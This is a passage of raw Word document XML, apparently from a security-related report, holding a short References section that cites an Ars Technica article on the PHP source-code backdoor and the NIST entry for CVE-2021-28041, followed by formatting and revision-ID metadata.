      <w:r w:rsidR="005C1EE5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘cat’</w:t>
      </w:r>
      <w:r w:rsidR="005C1EE5">
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6154E9C1" w14:textId="77777777" w:rsidR="00C32FCE" w:rsidRPr="00C32FCE" w:rsidRDefault="00C32FCE" w:rsidP="00C32FCE"/>
    <w:p w14:paraId="3E3A0992" w14:textId="77777777" w:rsidR="00940C98" w:rsidRDefault="00940C98" w:rsidP="00174558"/>
    <w:p w14:paraId="60D6BE8B" w14:textId="4C9AA771" w:rsidR="001E08AC" w:rsidRPr="001E08AC" w:rsidRDefault="00940C98" w:rsidP="003903C8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc74569238"/>
      <w:r>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="2582515F" w14:textId="01A49C49" w:rsidR="001E08AC" w:rsidRDefault="001E08AC" w:rsidP="00940C98">
      <w:r>
        <w:t>Dan Goodin (20</w:t>
      </w:r>
      <w:r w:rsidR="00C200CC">
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00FB702B">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">Hackers backdoor PHP source code after breaching internal </w:t>
      </w:r>
      <w:r w:rsidR="00246E0B">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">git server </w:t>
      </w:r>
      <w:r>
        <w:t>[O</w:t>
      </w:r>
      <w:r w:rsidR="00C200CC">
        <w:t>nline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">] Available </w:t>
      </w:r>
      <w:r w:rsidRPr="00C93657">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>at:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00E655FF" w:rsidRPr="00E655FF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://arstechnica.com/gadgets/2021/03/hackers-backdoor-php-source-code-after-breaching-internal-git-server/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. (Accessed </w:t>
      </w:r>
      <w:r w:rsidR="00246E0B">
        <w:t>09</w:t>
      </w:r>
      <w:r w:rsidR="00246E0B" w:rsidRPr="00246E0B">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00246E0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E655FF">
        <w:t>June 2021</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD0B7A5" w14:textId="1B02FCF0" w:rsidR="0015612C" w:rsidRPr="00940C98" w:rsidRDefault="0015612C" w:rsidP="0015612C">
      <w:r>
        <w:t xml:space="preserve">NIST (2021) </w:t>
      </w:r>
      <w:r w:rsidR="0055174B" w:rsidRPr="0055174B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidR="006B219D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-2021-28041</w:t>
      </w:r>
      <w:r w:rsidR="0055174B" w:rsidRPr="0055174B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Detail</w:t>
      </w:r>
      <w:r w:rsidR="0055174B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0055174B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[Online] </w:t>
      </w:r>
      <w:r w:rsidR="00022E86">
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Available </w:t>
      </w:r>
      <w:r w:rsidRPr="00C93657">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>at:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="006B219D" w:rsidRPr="00022E86">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2021-28041</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>. (Accessed 09</w:t>
      </w:r>
      <w:r w:rsidRPr="00246E0B">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> June 2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368A7C8D" w14:textId="77777777" w:rsidR="0015612C" w:rsidRPr="00940C98" w:rsidRDefault="0015612C" w:rsidP="00940C98"/>
    <w:sectPr w:rsidR="0015612C" w:rsidRPr="00940C98" w:rsidSect="001A2CC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0756F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0AB8AF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4125D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="74F09C6C"/>
    <w:lvl w:ilvl="0" w:tplc="0809000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:p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1464FFC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="95FECD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E4390C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="92124B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BB69B7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D48C7D7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7A23DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2169F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1B6EB5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB32726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996CD4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ACE66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wNTK1NDe0sDA2MbRQ0lEKTi0uzszPAymwrAUAMS/CdywAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00523317"/>
    <w:rsid w:val="00001E31"/>
    <w:rsid w:val="00002A75"/>
    <w:rsid w:val="00003FCB"/>
    <w:rsid w:val="00010218"/>
    <w:rsid w:val="00011B12"/>
    <w:rsid w:val="00012EDF"/>
    <w:rsid w:val="000174AC"/>
    <w:rsid w:val="00022E86"/>
    <w:rsid w:val="00032849"/>
    <w:rsid w:val="00032993"/>
    <w:rsid w:val="000330BD"/>
    <w:rsid w:val="00036819"/>
    <w:rsid w:val="00051ADC"/>
    <w:rsid w:val="00052F74"/>
    <w:rsid w:val="000547FF"/>
    <w:rsid w:val="00055BDB"/>
    <w:rsid w:val="00055D7E"/>
    <w:rsid w:val="00061DA0"/>
    <w:rsid w:val="0006559C"/>
    <w:rsid w:val="00066263"/>
    <w:rsid w:val="000674B0"/>
    <w:rsid w:val="0008035C"/>
    <w:rsid w:val="0008077B"/>
    <w:rsid w:val="00081663"/>
    <w:rsid w:val="00085293"/>
    <w:rsid w:val="00086D13"/>
    <w:rsid w:val="00087262"/>
    <w:rsid w:val="000A4A65"/>
    <w:rsid w:val="000B38D4"/>
    <w:rsid w:val="000B7327"/>
    <w:rsid w:val="000C04B2"/>
    <w:rsid w:val="000C09D3"/>
    <w:rsid w:val="000C35F8"/>
    <w:rsid w:val="000C39C5"/>
    <w:rsid w:val="000C46D8"/>
    <w:rsid w:val="000D18A0"/>
    <w:rsid w:val="000E12A7"/>
    <w:rsid w:val="000E2E94"/>
    <w:rsid w:val="000F2F8F"/>
    <w:rsid w:val="000F550A"/>
    <w:rsid w:val="000F5EFC"/>
    <w:rsid w:val="000F60AF"/>
    <w:rsid w:val="0010039C"/>
    <w:rsid w:val="00105E62"/>
    <w:rsid w:val="00111D30"/>
    <w:rsid w:val="00115000"/>
    <w:rsid w:val="001225B9"/>
    <w:rsid w:val="00126820"/>
    <w:rsid w:val="00126F05"/>
    <w:rsid w:val="00127B37"/>
    <w:rsid w:val="00132656"/>
    <w:rsid w:val="00135FFE"/>
    <w:rsid w:val="00136AA6"/>
    <w:rsid w:val="00141A0D"/>
    <w:rsid w:val="00147334"/>
    <w:rsid w:val="00153599"/>
    <w:rsid w:val="00155343"/>
    <w:rsid w:val="0015612C"/>
    <w:rsid w:val="00162DF2"/>
    <w:rsid w:val="0016310C"/>
    <w:rsid w:val="00164D12"/>
    <w:rsid w:val="00171788"/>
    <w:rsid w:val="001733C1"/>
    <w:rsid w:val="00174558"/>
    <w:rsid w:val="001749B3"/>
    <w:rsid w:val="0018033D"/>
    <w:rsid w:val="00186D25"/>
    <w:rsid w:val="001924A0"/>
    <w:rsid w:val="0019276B"/>
    <w:rsid w:val="001963A6"/>
    <w:rsid w:val="0019651B"/>
    <w:rsid w:val="001A2CCA"/>
    <w:rsid w:val="001A2EE2"/>
    <w:rsid w:val="001A4157"/>
    <w:rsid w:val="001B3F9F"/>
    <w:rsid w:val="001C1C90"/>
    <w:rsid w:val="001D0DDD"/>
    <w:rsid w:val="001E08AC"/>
    <w:rsid w:val="001E3341"/>
    <w:rsid w:val="001E52BC"/>
    <w:rsid w:val="001E6402"/>
    <w:rsid w:val="001E7CD0"/>
    <w:rsid w:val="001F18D7"/>
    <w:rsid w:val="001F4524"/>
    <w:rsid w:val="001F4F39"/>
    <w:rsid w:val="00201F1F"/>
    <w:rsid w:val="0020253C"/>
    <w:rsid w:val="0021077A"/>
    <w:rsid w:val="00211619"/>
    <w:rsid w:val="00217EF2"/>
    <w:rsid w:val="00224676"/>
    <w:rsid w:val="0024103C"/>
    <w:rsid w:val="002453A5"/>
    <w:rsid w:val="00246E0B"/>
    <w:rsid w:val="002515AB"/>
    <w:rsid w:val="0025440C"/>
    <w:rsid w:val="002572D6"/>
    <w:rsid w:val="00263760"/>
    <w:rsid w:val="0026729F"/>
    <w:rsid w:val="00270A8B"/>
    <w:rsid w:val="00271BB5"/>
    <w:rsid w:val="00283FBC"/>
    <w:rsid w:val="002968A6"/>
    <w:rsid w:val="002A2454"/>
    <w:rsid w:val="002B414D"/>
    <w:rsid w:val="002C0D79"/>
    <w:rsid w:val="002C7E46"/>
    <w:rsid w:val="002C7F0B"/>
    <w:rsid w:val="002D09B1"/>
    <w:rsid w:val="002D365D"/>
    <w:rsid w:val="002D796A"/>
    <w:rsid w:val="002F0276"/>
    <w:rsid w:val="002F095C"/>
    <w:rsid w:val="002F4E91"/>
    <w:rsid w:val="00302AEB"/>
    <w:rsid w:val="00305940"/>
    <w:rsid w:val="00310CEF"/>
    <w:rsid w:val="003135A1"/>
    <w:rsid w:val="00317FAD"/>
    <w:rsid w:val="00322BFB"/>
    <w:rsid w:val="003272DB"/>
    <w:rsid w:val="00334117"/>
    <w:rsid w:val="00341F3F"/>
    <w:rsid w:val="003447BD"/>
    <w:rsid w:val="0034560D"/>
    <w:rsid w:val="00352928"/>
    <w:rsid w:val="00354529"/>
    <w:rsid w:val="00354C05"/>
    <w:rsid w:val="0035541B"/>
    <w:rsid w:val="00361E83"/>
    <w:rsid w:val="003631E4"/>
    <w:rsid w:val="003637C7"/>
    <w:rsid w:val="003712E7"/>
    <w:rsid w:val="00381531"/>
    <w:rsid w:val="0038192B"/>
    <w:rsid w:val="003903C8"/>
    <w:rsid w:val="00392F5F"/>
    <w:rsid w:val="003A1421"/>
    <w:rsid w:val="003A26A5"/>
    <w:rsid w:val="003A5AEC"/>
    <w:rsid w:val="003A604F"/>
    <w:rsid w:val="003B4A4A"/>
    <w:rsid w:val="003B7333"/>
    <w:rsid w:val="003C747C"/>
    <w:rsid w:val="003D0742"/>
    <w:rsid w:val="003D638B"/>
    <w:rsid w:val="003D6CE2"/>
    <w:rsid w:val="003E2345"/>
    <w:rsid w:val="003F21B0"/>
    <w:rsid w:val="003F2EB0"/>
    <w:rsid w:val="003F5F31"/>
    <w:rsid w:val="00400C13"/>
    <w:rsid w:val="0040220E"/>
    <w:rsid w:val="00413201"/>
    <w:rsid w:val="00414137"/>
    <w:rsid w:val="0041512D"/>
    <w:rsid w:val="00425D56"/>
    <w:rsid w:val="00431918"/>
    <w:rsid w:val="00432777"/>
    <w:rsid w:val="00432982"/>
    <w:rsid w:val="004331AF"/>
    <w:rsid w:val="00443C60"/>
    <w:rsid w:val="0044449F"/>
    <w:rsid w:val="0044679D"/>
    <w:rsid w:val="004477BB"/>
    <w:rsid w:val="00453A49"/>
    <w:rsid w:val="00456877"/>
    <w:rsid w:val="00461839"/>
    <w:rsid w:val="00464BDB"/>
    <w:rsid w:val="0047341D"/>
    <w:rsid w:val="00475961"/>
    <w:rsid w:val="0047683D"/>
    <w:rsid w:val="00480FF3"/>
    <w:rsid w:val="00481E8B"/>
    <w:rsid w:val="004842BE"/>
    <w:rsid w:val="00490EEA"/>
    <w:rsid w:val="00491493"/>
    <w:rsid w:val="00493C41"/>
    <w:rsid w:val="00495ED7"/>
    <w:rsid w:val="004A099C"/>
    <w:rsid w:val="004A2163"/>
    <w:rsid w:val="004C4535"/>
    <w:rsid w:val="004C5D7A"/>
    <w:rsid w:val="004C6C71"/>
    <w:rsid w:val="004C7031"/>
    <w:rsid w:val="004C7112"/>
    <w:rsid w:val="004D1683"/>
    <w:rsid w:val="004D5570"/>
    <w:rsid w:val="004E0155"/>
    <w:rsid w:val="004F14DC"/>
    <w:rsid w:val="004F2D12"/>
    <w:rsid w:val="004F434F"/>
    <w:rsid w:val="004F730D"/>
    <w:rsid w:val="004F79BE"/>
    <w:rsid w:val="00501865"/>
    <w:rsid w:val="00505A1B"/>
    <w:rsid w:val="00510849"/>
    <w:rsid w:val="00510998"/>
    <w:rsid w:val="0051405D"/>
    <w:rsid w:val="0052240C"/>
    <w:rsid w:val="00523317"/>
    <w:rsid w:val="005255AD"/>
    <w:rsid w:val="005320D9"/>
    <w:rsid w:val="00536710"/>
    <w:rsid w:val="0055174B"/>
    <w:rsid w:val="00554FCE"/>
    <w:rsid w:val="00557DEB"/>
    <w:rsid w:val="0056181C"/>
    <w:rsid w:val="00570BEE"/>
    <w:rsid w:val="0057366E"/>
    <w:rsid w:val="00577E91"/>
    <w:rsid w:val="005827C8"/>
    <w:rsid w:val="0058408A"/>
    <w:rsid w:val="0059006F"/>
    <w:rsid w:val="005915C8"/>
    <w:rsid w:val="005A0CBE"/>
    <w:rsid w:val="005A18DF"/>
    <w:rsid w:val="005B11E6"/>
    <w:rsid w:val="005C145A"/>
    <w:rsid w:val="005C1EE5"/>
    <w:rsid w:val="005D4C22"/>
    <w:rsid w:val="005D531A"/>
    <w:rsid w:val="005D7AB9"/>
    <w:rsid w:val="005E1189"/>
    <w:rsid w:val="005E3148"/>
    <w:rsid w:val="005F0469"/>
    <w:rsid w:val="005F38C6"/>
    <w:rsid w:val="005F4797"/>
    <w:rsid w:val="005F51A9"/>
    <w:rsid w:val="006025A6"/>
    <w:rsid w:val="00605D4B"/>
    <w:rsid w:val="00606594"/>
    <w:rsid w:val="006110D6"/>
    <w:rsid w:val="00615364"/>
    <w:rsid w:val="0062032D"/>
    <w:rsid w:val="00620EFB"/>
    <w:rsid w:val="00624876"/>
    <w:rsid w:val="00625110"/>
    <w:rsid w:val="00630E16"/>
    <w:rsid w:val="00630F26"/>
    <w:rsid w:val="00631399"/>
    <w:rsid w:val="00634A02"/>
    <w:rsid w:val="0065005B"/>
    <w:rsid w:val="0065576F"/>
    <w:rsid w:val="00655D41"/>
    <w:rsid w:val="0065664D"/>
    <w:rsid w:val="006566FA"/>
    <w:rsid w:val="006631C3"/>
    <w:rsid w:val="006678E4"/>
    <w:rsid w:val="006802A5"/>
    <w:rsid w:val="00691850"/>
    <w:rsid w:val="006A0D63"/>
    <w:rsid w:val="006A6602"/>
    <w:rsid w:val="006B219D"/>
    <w:rsid w:val="006B305D"/>
    <w:rsid w:val="006B4262"/>
    <w:rsid w:val="006C1EF3"/>
    <w:rsid w:val="006C2EE5"/>
    <w:rsid w:val="006D0CC7"/>
    <w:rsid w:val="006D0DC6"/>
    <w:rsid w:val="006D22DF"/>
    <w:rsid w:val="006D6967"/>
    <w:rsid w:val="006E4C85"/>
    <w:rsid w:val="006E7F41"/>
    <w:rsid w:val="006F2241"/>
    <w:rsid w:val="006F3C3C"/>
    <w:rsid w:val="006F58A9"/>
    <w:rsid w:val="00700F93"/>
    <w:rsid w:val="00702060"/>
    <w:rsid w:val="00710202"/>
    <w:rsid w:val="00711285"/>
    <w:rsid w:val="007149EE"/>
    <w:rsid w:val="00716A7E"/>
    <w:rsid w:val="00721F15"/>
    <w:rsid w:val="0072281F"/>
    <w:rsid w:val="00724048"/>
    <w:rsid w:val="00726EEB"/>
    <w:rsid w:val="00727CA7"/>
    <w:rsid w:val="00731ADD"/>
    <w:rsid w:val="00735160"/>
    <w:rsid w:val="00735EC1"/>
    <w:rsid w:val="007367A2"/>
    <w:rsid w:val="00737938"/>
    <w:rsid w:val="00740CF3"/>
    <w:rsid w:val="00743385"/>
    <w:rsid w:val="00744CF5"/>
    <w:rsid w:val="00746BF2"/>
    <w:rsid w:val="0075535E"/>
    <w:rsid w:val="00763F92"/>
    <w:rsid w:val="00770639"/>
    <w:rsid w:val="00771737"/>
    <w:rsid w:val="00777674"/>
    <w:rsid w:val="00780901"/>
    <w:rsid w:val="007847AF"/>
    <w:rsid w:val="007908C9"/>
    <w:rsid w:val="00790CE1"/>
    <w:rsid w:val="007A2402"/>
    <w:rsid w:val="007A2B52"/>
    <w:rsid w:val="007A3C18"/>
    <w:rsid w:val="007A5479"/>
    <w:rsid w:val="007A6391"/>
    <w:rsid w:val="007C2C5E"/>
    <w:rsid w:val="007C47F2"/>
    <w:rsid w:val="007C6CEB"/>
    <w:rsid w:val="007D1E94"/>
    <w:rsid w:val="007D2766"/>
    <w:rsid w:val="007D2DC0"/>
    <w:rsid w:val="007D3903"/>
    <w:rsid w:val="007E3DF1"/>
    <w:rsid w:val="007E7474"/>
    <w:rsid w:val="007E7E5E"/>
    <w:rsid w:val="007F1119"/>
    <w:rsid w:val="007F2F7B"/>
    <w:rsid w:val="007F333D"/>
    <w:rsid w:val="007F3E42"/>
    <w:rsid w:val="008048CB"/>
    <w:rsid w:val="00806DAC"/>
    <w:rsid w:val="0081248B"/>
    <w:rsid w:val="00812673"/>
    <w:rsid w:val="00814BB9"/>
    <w:rsid w:val="00814BD6"/>
    <w:rsid w:val="00815E72"/>
    <w:rsid w:val="00817A1D"/>
    <w:rsid w:val="00820240"/>
    <w:rsid w:val="008205FB"/>
    <w:rsid w:val="0082275A"/>
    <w:rsid w:val="00826988"/>
    <w:rsid w:val="0084434C"/>
    <w:rsid w:val="0085016B"/>
    <w:rsid w:val="0086084F"/>
    <w:rsid w:val="00864881"/>
    <w:rsid w:val="00864CC7"/>
    <w:rsid w:val="00870BFE"/>
    <w:rsid w:val="00872C95"/>
    <w:rsid w:val="0088086F"/>
    <w:rsid w:val="0089435A"/>
    <w:rsid w:val="008A0132"/>
    <w:rsid w:val="008A2D84"/>
    <w:rsid w:val="008A3F4E"/>
    <w:rsid w:val="008A476C"/>
    <w:rsid w:val="008A53B6"/>
    <w:rsid w:val="008B61B5"/>
    <w:rsid w:val="008C64A3"/>
    <w:rsid w:val="008C6FFD"/>
    <w:rsid w:val="008D5138"/>
    <w:rsid w:val="008E16CC"/>
    <w:rsid w:val="008E5EC1"/>
    <w:rsid w:val="0090303D"/>
    <w:rsid w:val="00904B9F"/>
    <w:rsid w:val="00907CA3"/>
    <w:rsid w:val="00916A57"/>
    <w:rsid w:val="009173DA"/>
    <w:rsid w:val="00923F14"/>
    <w:rsid w:val="00925C5D"/>
    <w:rsid w:val="00931229"/>
    <w:rsid w:val="00934F03"/>
    <w:rsid w:val="00940C98"/>
    <w:rsid w:val="00957466"/>
    <w:rsid w:val="00964B56"/>
    <w:rsid w:val="00964CF2"/>
    <w:rsid w:val="00971551"/>
    <w:rsid w:val="009738F3"/>
    <w:rsid w:val="009765B8"/>
    <w:rsid w:val="009971B2"/>
    <w:rsid w:val="009A2B3D"/>
    <w:rsid w:val="009A3BF6"/>
    <w:rsid w:val="009A4DAB"/>
    <w:rsid w:val="009B0F22"/>
    <w:rsid w:val="009B60AA"/>
    <w:rsid w:val="009B712F"/>
    <w:rsid w:val="009D3BA3"/>
    <w:rsid w:val="009D7460"/>
    <w:rsid w:val="009E4C42"/>
    <w:rsid w:val="009F4603"/>
    <w:rsid w:val="009F621E"/>
    <w:rsid w:val="00A0484C"/>
    <w:rsid w:val="00A112CA"/>
    <w:rsid w:val="00A12D6F"/>
    <w:rsid w:val="00A135A2"/>
    <w:rsid w:val="00A13CD2"/>
    <w:rsid w:val="00A14D72"/>
    <w:rsid w:val="00A163E7"/>
    <w:rsid w:val="00A17718"/>
    <w:rsid w:val="00A22ACA"/>
    <w:rsid w:val="00A25650"/>
    <w:rsid w:val="00A31472"/>
    <w:rsid w:val="00A3728F"/>
    <w:rsid w:val="00A37B5E"/>
    <w:rsid w:val="00A44204"/>
    <w:rsid w:val="00A44D64"/>
    <w:rsid w:val="00A60968"/>
    <w:rsid w:val="00A63789"/>
    <w:rsid w:val="00A660AE"/>
    <w:rsid w:val="00A71E9C"/>
    <w:rsid w:val="00A72F27"/>
    <w:rsid w:val="00A82671"/>
    <w:rsid w:val="00A83F47"/>
    <w:rsid w:val="00A87953"/>
    <w:rsid w:val="00A91D23"/>
    <w:rsid w:val="00A94797"/>
    <w:rsid w:val="00A94B23"/>
    <w:rsid w:val="00A9576A"/>
    <w:rsid w:val="00AA0ED0"/>
    <w:rsid w:val="00AA22D8"/>
    <w:rsid w:val="00AB65AF"/>
    <w:rsid w:val="00AC118B"/>
    <w:rsid w:val="00AC2422"/>
    <w:rsid w:val="00AC2D37"/>
    <w:rsid w:val="00AC763C"/>
    <w:rsid w:val="00AE0086"/>
    <w:rsid w:val="00AE04E8"/>
    <w:rsid w:val="00AE78DC"/>
    <w:rsid w:val="00AF622E"/>
    <w:rsid w:val="00AF78B1"/>
    <w:rsid w:val="00B073CA"/>
    <w:rsid w:val="00B16C25"/>
    <w:rsid w:val="00B31F39"/>
    <w:rsid w:val="00B422EF"/>
    <w:rsid w:val="00B5274D"/>
    <w:rsid w:val="00B53757"/>
    <w:rsid w:val="00B567CA"/>
    <w:rsid w:val="00B60CBD"/>
    <w:rsid w:val="00B661D0"/>
    <w:rsid w:val="00B72909"/>
    <w:rsid w:val="00B75063"/>
    <w:rsid w:val="00B901F5"/>
    <w:rsid w:val="00B9057E"/>
    <w:rsid w:val="00B9552D"/>
    <w:rsid w:val="00B97080"/>
    <w:rsid w:val="00BA1019"/>
    <w:rsid w:val="00BA27AE"/>
    <w:rsid w:val="00BB1661"/>
    <w:rsid w:val="00BC088F"/>
    <w:rsid w:val="00BD2810"/>
    <w:rsid w:val="00BD45F2"/>
    <w:rsid w:val="00BD4F99"/>
    <w:rsid w:val="00BD627D"/>
    <w:rsid w:val="00BD732C"/>
    <w:rsid w:val="00BD7374"/>
    <w:rsid w:val="00BE1884"/>
    <w:rsid w:val="00BE7831"/>
    <w:rsid w:val="00BF0889"/>
    <w:rsid w:val="00BF3A7C"/>
    <w:rsid w:val="00BF3D28"/>
    <w:rsid w:val="00BF3F1C"/>
    <w:rsid w:val="00BF45D0"/>
    <w:rsid w:val="00C10AD5"/>
    <w:rsid w:val="00C147C4"/>
    <w:rsid w:val="00C16DB0"/>
    <w:rsid w:val="00C1718E"/>
    <w:rsid w:val="00C200CC"/>
    <w:rsid w:val="00C22757"/>
    <w:rsid w:val="00C2286D"/>
    <w:rsid w:val="00C238A8"/>
    <w:rsid w:val="00C3269D"/>
    <w:rsid w:val="00C32FCE"/>
    <w:rsid w:val="00C33F37"/>
    <w:rsid w:val="00C3402D"/>
    <w:rsid w:val="00C34707"/>
    <w:rsid w:val="00C43146"/>
    <w:rsid w:val="00C46D8D"/>
    <w:rsid w:val="00C47140"/>
    <w:rsid w:val="00C62B81"/>
    <w:rsid w:val="00C632B7"/>
    <w:rsid w:val="00C64843"/>
    <w:rsid w:val="00C66D4D"/>
    <w:rsid w:val="00C70CF0"/>
    <w:rsid w:val="00C71BBD"/>
    <w:rsid w:val="00C73BB6"/>
    <w:rsid w:val="00C85827"/>
    <w:rsid w:val="00C92BF3"/>
    <w:rsid w:val="00C97D83"/>
    <w:rsid w:val="00CA331C"/>
    <w:rsid w:val="00CA5F0F"/>
    <w:rsid w:val="00CA7407"/>
    <w:rsid w:val="00CA7B25"/>
    <w:rsid w:val="00CB0032"/>
    <w:rsid w:val="00CC1363"/>
    <w:rsid w:val="00CD0331"/>
    <w:rsid w:val="00CD0373"/>
    <w:rsid w:val="00CD1477"/>
    <w:rsid w:val="00CD2BE8"/>
    <w:rsid w:val="00CD7A50"/>
    <w:rsid w:val="00CE1E11"/>
    <w:rsid w:val="00CE53E2"/>
    <w:rsid w:val="00CE5C2C"/>
    <w:rsid w:val="00CF0EBE"/>
    <w:rsid w:val="00CF621B"/>
    <w:rsid w:val="00D160F9"/>
    <w:rsid w:val="00D204C8"/>
    <w:rsid w:val="00D3732A"/>
    <w:rsid w:val="00D378BE"/>
    <w:rsid w:val="00D40E36"/>
    <w:rsid w:val="00D42EEA"/>
    <w:rsid w:val="00D47892"/>
    <w:rsid w:val="00D63A33"/>
    <w:rsid w:val="00D67021"/>
    <w:rsid w:val="00D70BA0"/>
    <w:rsid w:val="00D85A5B"/>
    <w:rsid w:val="00D86559"/>
    <w:rsid w:val="00DA3B18"/>
    <w:rsid w:val="00DA62DF"/>
    <w:rsid w:val="00DB0985"/>
    <w:rsid w:val="00DB774E"/>
    <w:rsid w:val="00DC09F2"/>
    <w:rsid w:val="00DC15A3"/>
    <w:rsid w:val="00DC3ED8"/>
    <w:rsid w:val="00DC46C3"/>
    <w:rsid w:val="00DC52D1"/>
    <w:rsid w:val="00DC6619"/>
    <w:rsid w:val="00DD1458"/>
    <w:rsid w:val="00DD70EE"/>
    <w:rsid w:val="00DD7858"/>
    <w:rsid w:val="00DE0581"/>
    <w:rsid w:val="00DE08E2"/>
    <w:rsid w:val="00DE608A"/>
    <w:rsid w:val="00DF6543"/>
    <w:rsid w:val="00E0117B"/>
    <w:rsid w:val="00E12A07"/>
    <w:rsid w:val="00E15BB6"/>
    <w:rsid w:val="00E21EEA"/>
    <w:rsid w:val="00E244B3"/>
    <w:rsid w:val="00E2469A"/>
    <w:rsid w:val="00E27DF6"/>
    <w:rsid w:val="00E34802"/>
    <w:rsid w:val="00E34D3B"/>
    <w:rsid w:val="00E4285C"/>
    <w:rsid w:val="00E46490"/>
    <w:rsid w:val="00E53287"/>
    <w:rsid w:val="00E551B2"/>
    <w:rsid w:val="00E63E3F"/>
    <w:rsid w:val="00E655FF"/>
    <w:rsid w:val="00E70D21"/>
    <w:rsid w:val="00E72A2F"/>
    <w:rsid w:val="00E9253F"/>
    <w:rsid w:val="00E941FD"/>
    <w:rsid w:val="00E95477"/>
    <w:rsid w:val="00E960F7"/>
    <w:rsid w:val="00EA36C0"/>
    <w:rsid w:val="00EA5FE5"/>
    <w:rsid w:val="00EB3104"/>
    <w:rsid w:val="00EB3730"/>
    <w:rsid w:val="00EB505A"/>
    <w:rsid w:val="00EB689B"/>
    <w:rsid w:val="00EC0252"/>
    <w:rsid w:val="00EC6056"/>
    <w:rsid w:val="00ED2AAF"/>
    <w:rsid w:val="00EE1216"/>
    <w:rsid w:val="00EE5FA9"/>
    <w:rsid w:val="00EE6C4B"/>
    <w:rsid w:val="00EE6EC5"/>
    <w:rsid w:val="00F01139"/>
    <w:rsid w:val="00F02E10"/>
    <w:rsid w:val="00F03E6B"/>
    <w:rsid w:val="00F075BB"/>
    <w:rsid w:val="00F12C10"/>
    <w:rsid w:val="00F20A01"/>
    <w:rsid w:val="00F21BD1"/>
    <w:rsid w:val="00F22E37"/>
    <w:rsid w:val="00F2757D"/>
    <w:rsid w:val="00F30F9C"/>
    <w:rsid w:val="00F32A4E"/>
    <w:rsid w:val="00F340E0"/>
    <w:rsid w:val="00F40664"/>
    <w:rsid w:val="00F42B91"/>
    <w:rsid w:val="00F43390"/>
    <w:rsid w:val="00F465F1"/>
    <w:rsid w:val="00F46E7E"/>
    <w:rsid w:val="00F52258"/>
    <w:rsid w:val="00F56F1E"/>
    <w:rsid w:val="00F60839"/>
    <w:rsid w:val="00F61DA6"/>
    <w:rsid w:val="00F73B91"/>
    <w:rsid w:val="00F73C81"/>
    <w:rsid w:val="00F80221"/>
    <w:rsid w:val="00F81DD6"/>
    <w:rsid w:val="00F873A2"/>
    <w:rsid w:val="00F87D76"/>
    <w:rsid w:val="00F91AF1"/>
    <w:rsid w:val="00F94710"/>
    <w:rsid w:val="00F94965"/>
    <w:rsid w:val="00FA51C3"/>
    <w:rsid w:val="00FA51FB"/>
    <w:rsid w:val="00FB0DDA"/>
    <w:rsid w:val="00FB1798"/>
    <w:rsid w:val="00FB652D"/>
    <w:rsid w:val="00FB702B"/>
    <w:rsid w:val="00FD536E"/>
    <w:rsid w:val="00FD7780"/>
    <w:rsid w:val="00FE029F"/>
    <w:rsid w:val="00FE07AE"/>
